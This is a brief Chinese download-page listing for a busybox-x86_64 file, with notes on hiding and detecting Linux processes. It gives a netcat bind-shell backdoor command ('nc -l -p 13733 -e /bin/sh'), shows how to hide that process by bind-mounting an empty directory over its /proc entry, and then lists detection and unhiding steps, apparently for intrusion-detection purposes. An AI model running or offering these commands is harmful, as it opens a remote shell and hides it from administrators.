文件名称:busybox-x86_64
文件大小:950KB
文件格式:
更新时间:2023-01-06 23:22:03
查看隐藏进程
Linux进程隐藏与检测1. 运行后门 nohup nc -l -p 13733 -e /bin/sh& 2. ps aux |grep ‘/bin/sh’ 查找进程PID mkdir /tmp/empty mount –bind /tmp/empty /proc/进程PID 3. cat /proc/$$/mountinfo 查看隐藏进程 cat /proc/mounts mount 4. 接触隐藏 umount /proc/进程PID 入侵检测之隐藏进程检测